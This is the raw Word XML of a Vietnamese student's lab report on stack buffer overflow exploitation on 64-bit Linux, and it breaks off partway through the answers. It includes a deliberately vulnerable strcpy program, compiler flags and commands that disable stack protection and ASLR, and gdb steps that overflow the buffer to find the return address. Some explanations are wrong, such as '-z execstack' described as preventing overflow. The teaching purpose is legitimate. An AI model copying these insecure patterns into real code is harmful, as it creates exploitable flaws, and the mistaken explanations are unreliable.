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1C8E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6305B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E9D272" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="-71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LAB 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543B52E1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E75822" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:right="-71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KHAI THÁC VÀ NGĂN CHẶN LỖI BUFFER OVERFLOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002CD464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DCB11C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835328" w14:textId="2DBBB5DC" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041A2D3B" w14:textId="52EF5EEF" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840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Họ tên và MSSV: </w:t>
      </w:r>
      <w:r w:rsidR="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nguyễn Thiên Tính - 0950080144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45E21C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82B492" w14:textId="6BDAD7D9" w:rsidR="004D1E38" w:rsidRDefault="00BB4DA8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youtube: </w:t>
      </w:r>
      <w:r w:rsidR="004D1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4D1E38" w:rsidRPr="00F95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@TinhNguyenThien-dp8iq/featured</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A349696" w14:textId="1859B508" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00BB4DA8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81F206" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="286" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="40" w:hanging="35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BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Các sinh viên bị phát hiện sao chép bài của nhau sẽ nhận 0đ cho tất cả bài thực hành của môn này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2EC1FE" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr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14:paraId="1ED52A1B" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="322" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="35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BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bài nộp phải ở dạng docx</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, hình minh họa phải rõ ràng chi tiết.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA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Hình minh hoạ chỉ cần chụp ở nội dung thực hiện, không chụp toàn màn hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD18CF" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="322" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="35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Quay lại quá trình làm bài</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, đưa video vào youtube và add link youtube vào trong file word, không gửi qua google drive, sv không có video sẽ không được chấm bài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6DB695" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="263" w:lineRule="auto"/>
        <w:ind w:right="2500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Câu 1: Khai thác lỗi Stack-based Buffer Overflow trên Linux 64 bit </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1. Soạn thảo 1 chương trình </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0255DC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A4A9B2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$mkdir bufferoverflow &amp;&amp; cd bufferoverflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EE42A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53D236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$nano buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB428E0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0E93F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#include&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5107DA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71AAD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#include&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB72893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9C856B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int main(int argc, char *argv[])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB71092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037B71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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A3860E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5A7F0F" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="250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char buf[100];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C93039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4BE960" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="250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strcpy(buf,argv[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344EC94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34C866" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="250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printf("Input was: %s\n",buf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F8DAB3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EB0993" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="250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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB32AE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3414CE" w14:textId="6A4F7181" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000" w:rsidP="0003482E">
      <w:pPr>
        <w:ind w:left="567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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidR="0003482E" w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0003482E"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518C8" wp14:editId="05B5E531">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52707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E346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31D65C" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr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1.2. Biên dịch chương trình </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buf.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F970D8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AFE1D" w14:textId="1D0F466F" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000" w:rsidP="0003482E">
      <w:pPr>
        <w:ind w:left="567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$gcc -g</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -fno-stack-protector -z execstack</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> buf.c -o buf</w:t>
      </w:r>
      <w:r w:rsidR="0003482E" w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0003482E"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E9C1F" wp14:editId="64CF7484">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1009023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6ABE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2A416" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="72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BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Giải thích ý nghĩa tham số:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289DA826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489092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sine" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-g: xin ra chỉ thị gỡ rối các chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF17EA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554E8" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="275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lastRenderedPageBreak/>
        <w:t>-fno-stack-protector: giúp tắt đi tính năng kiểm tra độ toàn vẹn của bộ nhớ stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB72D82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59BD59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-z execstack: ngăn chặn lỗi tràn bộ nhớ đệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1F978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8C2712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-o:tham số đầu ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3930B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ECB4A2" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr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1.3 Tắt chức năng Address Space Layout Randomization (ASLR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DA8812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2BD28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$sudo sysctl kernel.randomize_va_space=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F7E39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DA479F" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr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Hoặc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FA5C6E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0923E4" w14:textId="77777777" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="18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 xml:space="preserve">$sudo nano /proc/sys/kernel/randomize_va_space </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38CA70" w14:textId="26BF2274" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="0003482E">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="18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01ADF" wp14:editId="26534D76">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92801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AE3F" w14:textId="02B2A38B" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="1840"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#Chuyển giá trị 2 thành 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0168E6" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="275" w:lineRule="auto"/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B4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Giải thích ngắn gọn tại sao phải tắt chức năng ASLR:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4D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ặt chương trình vào vùng nhớ</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA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BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ngẩu nhiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63221A5E" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr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1.4 Cài đặt gdb và bắt đầu debug chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A67AF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E34420" w14:textId="77777777" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="394" w:lineRule="auto"/>
        <w:ind w:left="1440" w:right="2900"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo apt update &amp;&amp; apt install gdb -y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D486EC0" w14:textId="74B95D05" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="0003482E">
      <w:pPr>
        <w:spacing w:line="394" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="290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326ECC" wp14:editId="1401DBA0">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="838454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BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$gdb -q buf</w:t>
      </w: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71347" wp14:editId="0E84B434">
            <wp:extent cx="5943600" cy="3242310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2044582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2B25" w14:textId="3F6974BE" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="0003482E">
      <w:pPr>
        <w:spacing w:line="394" w:lineRule="auto"/>
        <w:ind w:left="567" w:right="2900"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECDB536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AD9CF3" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="263" w:lineRule="auto"/>
        <w:ind w:right="20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1.5 Bên trong môi trường gdb, chọn cú pháp assembly theo kiến trúc Intel và chuyển hàm main thành ngôn ngữ assembly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B094B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(gdb)set disassembly-flavor intel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FCF5DC" w14:textId="692D137C" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="0003482E">
      <w:pPr>
        <w:ind w:left="567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A56430" wp14:editId="542E47C8">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16999698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5530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E11590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(gdb)disass main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2B7D7C" w14:textId="7ADD9427" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="0003482E">
      <w:pPr>
        <w:ind w:left="567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EBA1F" wp14:editId="64380540">
            <wp:extent cx="5943600" cy="3242945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1586425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A5B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6B251E" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr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1.6 Xác định vị trí của return address (RIP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7BC47F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2DF263" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="72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(gdb)run $(python2 -c "print 'A'*</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 'B'*12 + 'C'*8 + 'D'*6")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B6527" w14:textId="08105E4A" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:ind w:left="567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304BCD" wp14:editId="66624D30">
            <wp:extent cx="5943600" cy="3242310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16442733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86EC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1CE61A" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="72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(gdb)info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCF936E" w14:textId="2656B349" w:rsidR="0003482E" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="00BB4DA8">
      <w:pPr>
        <w:ind w:left="567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9CECA" wp14:editId="5B910B10">
            <wp:extent cx="5943600" cy="3244215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179068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292B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C3987" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="72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(gdb)x/100x $rsp-200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257CC5B" w14:textId="70871954" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="0003482E" w:rsidP="00BB4DA8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C3327A" wp14:editId="09E3AEF2">
            <wp:extent cx="5943600" cy="3244215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3001324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C161" w14:textId="168DC738" w:rsidR="00C15F72" w:rsidRPr="00BB4DA8" w:rsidRDefault="00C15F72" w:rsidP="00BB4DA8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C2C24" wp14:editId="568BD349">
            <wp:extent cx="5943600" cy="3244215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15522696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9082" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="72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BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trả lời:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F8FB6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B913B6" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1610"/>
        </w:tabs>
        <w:spacing w:line="274" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="721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Ý nghĩa của thanh ghi</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rbp, rsp, rip</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: rbp chứa địa chỉ nền của bộ nhớ stack, rsp chứa địa chỉ đỉnh của bộ nhớ stack, rip dùng để stack ghi đè lên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435D162" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1580"/>
        </w:tabs>
        <w:ind w:left="1580" w:hanging="138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Địa chỉ và giá trị của thanh ghi</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rbp:địa chỉ 0x7fffffffdec8,giá trị =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE7326" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32843B6B" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="72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42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E83DB5" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09940753" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1580"/>
        </w:tabs>
        <w:ind w:left="1580" w:hanging="138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Địa chỉ và giá trị của thanh ghi</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Courier New" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> rip: địa chỉ 0x7fffffffded8, giá trị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9A1F8" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33F75E04" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="72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=8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE9EC3" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00AE0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7D7A79" w14:textId="77777777" w:rsidR="00AE0305" w:rsidRPr="00BB4DA8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1584"/>
        </w:tabs>
        <w:spacing w:line="311" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="721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Địa chỉ bắt đầu và kết thúc của </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB4DA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
